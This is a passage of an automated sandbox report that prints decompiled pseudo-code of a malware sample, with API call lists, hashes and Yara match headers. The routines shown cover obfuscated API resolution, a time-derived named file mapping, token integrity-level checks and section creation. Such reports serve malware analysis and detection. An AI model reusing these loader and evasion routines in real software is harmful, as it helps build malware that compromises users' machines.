				if(E00401538(_t44,  &_a4) != 0) {
					 *0x404138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x404138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E00401DE1(_t48 + _t14);
				 *0x404138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E00401DFC(_t43);
				goto L11;
			}




















                                                                                                                                                                                                                                    0x00401646
                                                                                                                                                                                                                                    0x0040164f
                                                                                                                                                                                                                                    0x00401652
                                                                                                                                                                                                                                    0x00401742
                                                                                                                                                                                                                                    0x00401742
                                                                                                                                                                                                                                    0x00401659
                                                                                                                                                                                                                                    0x0040165d
                                                                                                                                                                                                                                    0x00401663
                                                                                                                                                                                                                                    0x00401671
                                                                                                                                                                                                                                    0x00401672
                                                                                                                                                                                                                                    0x00401675
                                                                                                                                                                                                                                    0x00401678
                                                                                                                                                                                                                                    0x00401681
                                                                                                                                                                                                                                    0x00401684
                                                                                                                                                                                                                                    0x0040168a
                                                                                                                                                                                                                                    0x0040168d
                                                                                                                                                                                                                                    0x00401694
                                                                                                                                                                                                                                    0x0040173f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040173f
                                                                                                                                                                                                                                    0x0040169e
                                                                                                                                                                                                                                    0x004016ef
                                                                                                                                                                                                                                    0x004016ef
                                                                                                                                                                                                                                    0x00401705
                                                                                                                                                                                                                                    0x0040170a
                                                                                                                                                                                                                                    0x00401732
                                                                                                                                                                                                                                    0x0040170c
                                                                                                                                                                                                                                    0x0040170f
                                                                                                                                                                                                                                    0x00401717
                                                                                                                                                                                                                                    0x0040171a
                                                                                                                                                                                                                                    0x00401721
                                                                                                                                                                                                                                    0x00401721
                                                                                                                                                                                                                                    0x00401728
                                                                                                                                                                                                                                    0x00401728
                                                                                                                                                                                                                                    0x00401735
                                                                                                                                                                                                                                    0x0040173b
                                                                                                                                                                                                                                    0x0040173d
                                                                                                                                                                                                                                    0x0040173d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040173b
                                                                                                                                                                                                                                    0x004016ab
                                                                                                                                                                                                                                    0x004016e9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004016e9
                                                                                                                                                                                                                                    0x004016ad
                                                                                                                                                                                                                                    0x004016b0
                                                                                                                                                                                                                                    0x004016b9
                                                                                                                                                                                                                                    0x004016bb
                                                                                                                                                                                                                                    0x004016bf
                                                                                                                                                                                                                                    0x004016e1
                                                                                                                                                                                                                                    0x004016e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004016e1
                                                                                                                                                                                                                                    0x004016c1
                                                                                                                                                                                                                                    0x004016c6
                                                                                                                                                                                                                                    0x004016cd
                                                                                                                                                                                                                                    0x004016d2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004016d7
                                                                                                                                                                                                                                    0x004016da
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,76D263F0), ref: 0040185F
                                                                                                                                                                                                                                      • Part of subcall function 00401850: GetVersion.KERNEL32 ref: 0040186E
                                                                                                                                                                                                                                      • Part of subcall function 00401850: GetCurrentProcessId.KERNEL32 ref: 00401885
                                                                                                                                                                                                                                      • Part of subcall function 00401850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,00000000,76D263F0), ref: 0040165D
                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 00401663
                                                                                                                                                                                                                                      • Part of subcall function 004018F4: VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                                                                                                                                                                                                      • Part of subcall function 004018F4: memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                                                                                                                                                                                                      • Part of subcall function 004018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 00401684
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016B9
                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016D7
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040170F
                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 00401721
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401728
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00401730
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040173D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                    • Opcode ID: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                                                                                                                                                                                                    • Instruction ID: 3c547408fdc9ceb87cb50058a61b233f89e190b219f0f48a38aaaf96b39e067b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31A272901214ABCB10EFA59D8499F7ABDEF84351B14463BF901F32A0E738DA409B69
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F91B2F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E02F91B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02F9B0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2f9d27c; // 0x44a5a8
				_t5 = _t13 + 0x2f9e862; // 0x33e8e0a
				_t6 = _t13 + 0x2f9e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02F9AD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x2f9d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                                                                                                                    0x02f91b2f
                                                                                                                                                                                                                                    0x02f91b37
                                                                                                                                                                                                                                    0x02f91b3b
                                                                                                                                                                                                                                    0x02f91b41
                                                                                                                                                                                                                                    0x02f91b46
                                                                                                                                                                                                                                    0x02f91b4b
                                                                                                                                                                                                                                    0x02f91b4e
                                                                                                                                                                                                                                    0x02f91b51
                                                                                                                                                                                                                                    0x02f91b56
                                                                                                                                                                                                                                    0x02f91b57
                                                                                                                                                                                                                                    0x02f91b5a
                                                                                                                                                                                                                                    0x02f91b5f
                                                                                                                                                                                                                                    0x02f91b66
                                                                                                                                                                                                                                    0x02f91b70
                                                                                                                                                                                                                                    0x02f91b72
                                                                                                                                                                                                                                    0x02f91b73
                                                                                                                                                                                                                                    0x02f91b76
                                                                                                                                                                                                                                    0x02f91b92
                                                                                                                                                                                                                                    0x02f91b98
                                                                                                                                                                                                                                    0x02f91b9c
                                                                                                                                                                                                                                    0x02f91bea
                                                                                                                                                                                                                                    0x02f91b9e
                                                                                                                                                                                                                                    0x02f91bab
                                                                                                                                                                                                                                    0x02f91bbb
                                                                                                                                                                                                                                    0x02f91bc3
                                                                                                                                                                                                                                    0x02f91bd5
                                                                                                                                                                                                                                    0x02f91bd9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91bc5
                                                                                                                                                                                                                                    0x02f91bc8
                                                                                                                                                                                                                                    0x02f91bcd
                                                                                                                                                                                                                                    0x02f91bcf
                                                                                                                                                                                                                                    0x02f91bcf
                                                                                                                                                                                                                                    0x02f91bad
                                                                                                                                                                                                                                    0x02f91baf
                                                                                                                                                                                                                                    0x02f91bdb
                                                                                                                                                                                                                                    0x02f91bdc
                                                                                                                                                                                                                                    0x02f91bdc
                                                                                                                                                                                                                                    0x02f91bab
                                                                                                                                                                                                                                    0x02f91bf1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02F922EA,?,?,4D283A53,?,?), ref: 02F91B3B
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02F91B51
                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 02F91B76
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,02F9D2A8,00000004,00000000,00001000,?), ref: 02F91B92
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02F922EA,?,?,4D283A53), ref: 02F91BA4
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02F91BBB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02F922EA,?,?), ref: 02F91BDC
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02F922EA,?,?,4D283A53), ref: 02F91BE4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1814172918-0
                                                                                                                                                                                                                                    • Opcode ID: 52112aeba085ab16a49108d0796aec3c59e373d834422daf4e386dc77d05cd73
                                                                                                                                                                                                                                    • Instruction ID: 2fe08494c00899f4c8857ede7d7cf8cdbe9120863b6fbb5eb6ca1fed57eb5789
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52112aeba085ab16a49108d0796aec3c59e373d834422daf4e386dc77d05cd73
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74219676A40208BBEB21EFA8DC05F9B77AAAB48BD0F114162F719E7190E7709515CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2f9d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02F92049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02F99039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                                                                                                                    0x02f9925c
                                                                                                                                                                                                                                    0x02f99263
                                                                                                                                                                                                                                    0x02f9926a
                                                                                                                                                                                                                                    0x02f9927e
                                                                                                                                                                                                                                    0x02f99289
                                                                                                                                                                                                                                    0x02f992a1
                                                                                                                                                                                                                                    0x02f992ae
                                                                                                                                                                                                                                    0x02f992b1
                                                                                                                                                                                                                                    0x02f992b6
                                                                                                                                                                                                                                    0x02f992c1
                                                                                                                                                                                                                                    0x02f992c5
                                                                                                                                                                                                                                    0x02f992d4
                                                                                                                                                                                                                                    0x02f992d8
                                                                                                                                                                                                                                    0x02f992f4
                                                                                                                                                                                                                                    0x02f992f4
                                                                                                                                                                                                                                    0x02f992f8
                                                                                                                                                                                                                                    0x02f992f8
                                                                                                                                                                                                                                    0x02f992fd
                                                                                                                                                                                                                                    0x02f99301
                                                                                                                                                                                                                                    0x02f99307
                                                                                                                                                                                                                                    0x02f99308
                                                                                                                                                                                                                                    0x02f9930f
                                                                                                                                                                                                                                    0x02f99315

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02F99281
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02F992A1
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02F992B1
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02F99301
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02F992D4
                                                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02F992DC
                                                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02F992EC
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1295030180-0
                                                                                                                                                                                                                                    • Opcode ID: b093de99779fcc43df8be2b6b8cf59a962672573db592d4f2b3d1bfb0c20e3f1
                                                                                                                                                                                                                                    • Instruction ID: 3ea36fb540448d36a8034d8bd189f3b97cc9ef49e700e2130c189c2d35c98878
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b093de99779fcc43df8be2b6b8cf59a962672573db592d4f2b3d1bfb0c20e3f1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B216D75D0020DFFEF00AFA1DC84DEEBB79EB48744F10006AEA11A61A0C7758A15EF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9163F, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 272 2f9163f-2f9168b SysAllocString 273 2f917af-2f917b2 272->273 274 2f91691-2f916bd 272->274 275 2f917bd-2f917c0 273->275 276 2f917b4-2f917b7 SafeArrayDestroy 273->276 280 2f917ac 274->280 281 2f916c3-2f916cf call 2f92436 274->281 278 2f917cb-2f917d2 275->278 279 2f917c2-2f917c5 SysFreeString 275->279 276->275 279->278 280->273 281->280 284 2f916d5-2f916e5 281->284 284->280 286 2f916eb-2f91711 IUnknown_QueryInterface_Proxy 284->286 286->280 288 2f91717-2f9172b 286->288 290 2f91769-2f9176c 288->290 291 2f9172d-2f91730 288->291 293 2f9176e-2f91773 290->293 294 2f917a3-2f917a8 290->294 291->290 292 2f91732-2f91749 StrStrIW 291->292 295 2f9174b-2f91754 call 2f952f9 292->295 296 2f91760-2f91763 SysFreeString 292->296 293->294 297 2f91775-2f91780 call 2f91a70 293->297 294->280 295->296 302 2f91756-2f9175e call 2f92436 295->302 296->290 301 2f91785-2f91789 297->301 301->294 303 2f9178b-2f91790 301->303 302->296 305 2f9179e 303->305 306 2f91792-2f9179c 303->306 305->294 306->294
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 02F91680
                                                                                                                                                                                                                                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 02F91702
                                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(?,006E0069), ref: 02F91741
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F91763
                                                                                                                                                                                                                                      • Part of subcall function 02F952F9: SysAllocString.OLEAUT32(02F9C2B0), ref: 02F95349
                                                                                                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(?), ref: 02F917B7
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F917C5
                                                                                                                                                                                                                                      • Part of subcall function 02F92436: Sleep.KERNELBASE(000001F4), ref: 02F9247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2118684380-0
                                                                                                                                                                                                                                    • Opcode ID: 72faf788c4ca5e77da57a235fbf996a55f57583ebfb47dfc256bac7e77e460c2
                                                                                                                                                                                                                                    • Instruction ID: 82804302af95c4be01df12cfcc16cfd9088e7cfbfa911fa589217dbfdfe6420f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72faf788c4ca5e77da57a235fbf996a55f57583ebfb47dfc256bac7e77e460c2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F510D76D0020AAFDF10DFA8C9848AEB7B6FF88784B158939E615EB210D731AD45CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401A0F, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 308 401a0f-401a21 call 401de1 311 401ae2 308->311 312 401a27-401a5c GetModuleHandleA GetProcAddress 308->312 313 401ae9-401af0 311->313 314 401ada-401ae0 call 401dfc 312->314 315 401a5e-401a72 GetProcAddress 312->315 314->313 315->314 317 401a74-401a88 GetProcAddress 315->317 317->314 319 401a8a-401a9e GetProcAddress 317->319 319->314 320 401aa0-401ab4 GetProcAddress 319->320 320->314 321 401ab6-401ac7 call 401eb5 320->321 323 401acc-401ad1 321->323 323->314 324 401ad3-401ad8 323->324 324->313
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00401DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404150 + 0x405014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404150 + 0x405151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404150 + 0x405161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404150 + 0x405174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404150 + 0x405189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404150 + 0x40519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401EB5(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                                                                                    0x00401a1d
                                                                                                                                                                                                                                    0x00401a21
                                                                                                                                                                                                                                    0x00401ae2
                                                                                                                                                                                                                                    0x00401a27
                                                                                                                                                                                                                                    0x00401a3f
                                                                                                                                                                                                                                    0x00401a4e
                                                                                                                                                                                                                                    0x00401a55
                                                                                                                                                                                                                                    0x00401a59
                                                                                                                                                                                                                                    0x00401a5c
                                                                                                                                                                                                                                    0x00401ada
                                                                                                                                                                                                                                    0x00401adb
                                                                                                                                                                                                                                    0x00401a5e
                                                                                                                                                                                                                                    0x00401a6b
                                                                                                                                                                                                                                    0x00401a6f
                                                                                                                                                                                                                                    0x00401a72
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401a74
                                                                                                                                                                                                                                    0x00401a81
                                                                                                                                                                                                                                    0x00401a85
                                                                                                                                                                                                                                    0x00401a88
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401a8a
                                                                                                                                                                                                                                    0x00401a97
                                                                                                                                                                                                                                    0x00401a9b
                                                                                                                                                                                                                                    0x00401a9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401aa0
                                                                                                                                                                                                                                    0x00401aad
                                                                                                                                                                                                                                    0x00401ab1
                                                                                                                                                                                                                                    0x00401ab4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401ab6
                                                                                                                                                                                                                                    0x00401abc
                                                                                                                                                                                                                                    0x00401ac2
                                                                                                                                                                                                                                    0x00401ac7
                                                                                                                                                                                                                                    0x00401ace
                                                                                                                                                                                                                                    0x00401ad1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401ad3
                                                                                                                                                                                                                                    0x00401ad6
                                                                                                                                                                                                                                    0x00401ad6
                                                                                                                                                                                                                                    0x00401ad1
                                                                                                                                                                                                                                    0x00401ab4
                                                                                                                                                                                                                                    0x00401a9e
                                                                                                                                                                                                                                    0x00401a88
                                                                                                                                                                                                                                    0x00401a72
                                                                                                                                                                                                                                    0x00401a5c
                                                                                                                                                                                                                                    0x00401af0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00401DE1: HeapAlloc.KERNEL32(00000000,?,00401556,00000208,00000000,00000000,?,?,?,004016A9,?), ref: 00401DED
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                                                                                                                                                                                                      • Part of subcall function 00401EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 00401F12
                                                                                                                                                                                                                                      • Part of subcall function 00401EB5: memset.NTDLL ref: 00401F34
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1632424568-0
                                                                                                                                                                                                                                    • Opcode ID: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                                                                                                                                                                                                    • Instruction ID: a5b725abbf619f5b34b99e3f49f5d91652d314a6d7b06be396a476ddccf995a6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9211EB160160AAFD710DFA9DD88E6B7BECEF483447004476E905EB361D774E9018F68
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00401AFA, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
